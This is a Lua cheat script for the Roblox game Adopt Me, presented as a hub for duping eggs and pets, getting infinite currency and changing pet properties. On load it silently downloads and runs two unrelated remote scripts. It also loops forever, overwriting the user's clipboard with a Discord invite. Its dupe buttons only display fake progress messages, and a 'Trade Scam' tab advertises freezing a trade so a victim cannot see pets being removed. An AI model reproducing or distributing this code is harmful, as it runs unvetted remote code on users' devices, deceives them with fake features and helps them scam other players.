local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))() local Window = OrionLib:MakeWindow({Name = "Balling Scripts | Adopt Me Hub [3.5]❗", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"}) OrionLib:MakeNotification({ Name = "Loading Script...", Content = "Script will be loaded in 25-30 seconds | Note - Seconds Shown Here are not the exact loading time❗", Image = "rbxassetid://17849295859", Time = 50 }) --[[ ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/Goat-Hub103/FreeVersion/main/AdoptMe"))() --[[ ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/JulHubz/JulHub/main/JulHub"))() --[[ ]] while task.wait() do setclipboard("https://discord.com/invite/gauwE7p9DB") wait(20) end --[[ Name = - The name of the UI. HidePremium = - Whether or not the user details shows Premium status or not. SaveConfig = - Toggles the config saving in the UI. ConfigFolder = - The name of the folder where the configs are saved. IntroEnabled = - Whether or not to show the intro animation. IntroText = - Text to show in the intro animation. IntroIcon = - URL to the image you want to use in the intro animation. Icon = - URL to the image you want displayed on the window. CloseCallback = - Function to execute when the window is closed. ]] local Tab = Window:MakeTab({ Name = "Dupe Eggs🥚", Icon = "rbxassetid://4483345998", PremiumOnly = false }) OrionLib:MakeNotification({ Name = "Script Successfully Loaded", Content = "Loading Has been successful ", Image = "rbxassetid://17849312358", Time = 45 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddButton({ Name = "Equip Eggs To Dupe", Callback = function() OrionLib:MakeNotification({ Name = "Egg Selector", Content = "Egg Equipped Selected", Image = "rbxassetid://4483345998", Time = 5 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] end }) Tab:AddButton({ Name = "Click To Dupe Eggs", Callback = function() OrionLib:MakeNotification({ Name = "Duping Eggs....", Content = "Duping is in process..[Takes around 4-5 minutes] DONT THE LEAVE GAME ❗", Image = "rbxassetid://4483345998", Time = 120 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] end }) Tab:AddParagraph("READ❗","The Feature - Dupe Eggs - Will Not Work if ur in a private server") Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") local Tab = Window:MakeTab({ Name = "Trade Scam🙈", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddTextbox({ Name = "Username", Default = "Player", TextDisappear = false, Callback = function(Value) end }) --[[ Name = - The name of the textbox. Default = - The default value of the textbox. TextDisappear = - Makes the text disappear in the textbox after losing focus. Callback = - The function of the textbox. ]] Tab:AddButton({ Name = "Freeze Trade To The Victim", Callback = function() OrionLib:MakeNotification({ Name = "Freeze Trade Enabled", Content = "Take Out Your Pets The Victim Cant See", Image = "rbxassetid://4483345998", Time = 5 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] print("button pressed") end }) --[[ Name = - The name of the button. Callback = - The function of the button. ]] Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") local Tab = Window:MakeTab({ Name = "AutoFarm 🚜", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddButton({ Name = "[TrustedScript📄]Get AutoFarm Source ✅", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/JulHubz/JulHub/main/JulHub"))() end }) --[[ Name = - The name of the button. Callback = - The function of the button. ]] Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") local Tab = Window:MakeTab({ Name = "Dupe Pets 🔨", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddButton({ Name = "Equip Pets To Dupe", Callback = function() OrionLib:MakeNotification({ Name = "Pet Selector", Content = "Equipped Pets Successfully Selected", Image = "rbxassetid://4483345998", Time = 5 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] end }) Tab:AddButton({ Name = "Click To Dupe Pets", Callback = function() OrionLib:MakeNotification({ Name = "Duping Pets...", Content = "Duping in Process..[Takes Around 4-5 minutes] DONT LEAVE GAME❗", Image = "rbxassetid://4483345998", Time = 120 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] end }) Tab:AddParagraph("READ❗","The Feature - Dupe Eggs - Will Not Work if ur in a private server") Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") --[[ Name = - The name of the button. Callback = - The function of the button. ]] --[[ Name = - The name of the button. Callback = - The function of the button. ]] local Tab = Window:MakeTab({ Name = "Infinite Bucks 💸", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddButton({ Name = "Get Infinite Bucks💸", Callback = function() require(game:service'ReplicatedStorage'.Fsys).load("ClientData").update("money",(15999999984/16)) end }) Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") --[[ Name = - The name of the button. Callback = - The function of the button. ]] local Tab = Window:MakeTab({ Name = "MFR-NFR Changer 📦", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddButton({ Name = "MFR Changer-(Inventory🎒)", Callback = function() while true do wait() local clientData = require(game.ReplicatedStorage.ClientModules.Core.ClientData) local playerData = clientData.get_data()[tostring(game.Players.LocalPlayer)] for i,v in pairs(playerData.inventory.pets) do v.properties.rideable = true v.properties.flyable = true v.properties.mega_neon = true end end end }) Tab:AddButton({ Name = "NFR Changer-(Inventory🎒)", Callback = function() while true do wait() local clientData = require(game.ReplicatedStorage.ClientModules.Core.ClientData) local playerData = clientData.get_data()[tostring(game.Players.LocalPlayer)] for i,v in pairs(playerData.inventory.pets) do v.properties.rideable = true v.properties.flyable = true v.properties.neon = true end end end }) --[[ Name = - The name of the button. Callback = - The function of the button. ]] Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT") local Tab = Window:MakeTab({ Name = "Info | Discord", Icon = "rbxassetid://4483345998", PremiumOnly = false }) --[[ Name = - The name of the tab. Icon = - The icon of the tab. PremiumOnly = - Makes the tab accessible to Sirus Premium users only. ]] Tab:AddParagraph("My Discord server","Join my discord if u need anything❗") Tab:AddButton({ Name = "Copy Link To Discord Server 🎯", Callback = function() setclipboard("https://discord.com/invite/SASw2jSRkS") print("button pressed") end }) --[[ Name = - The name of the button. Callback = - The function of the button. ]] Tab:AddParagraph("NOTE❗","Some Features May Not Work If ur in a private server") Tab:AddParagraph("CREDITS❗","Coded And Made All By BallingScriptsYT") Tab:AddParagraph("Script Successfully Loaded❗","Enjoy The Script All By BallingScriptsYT")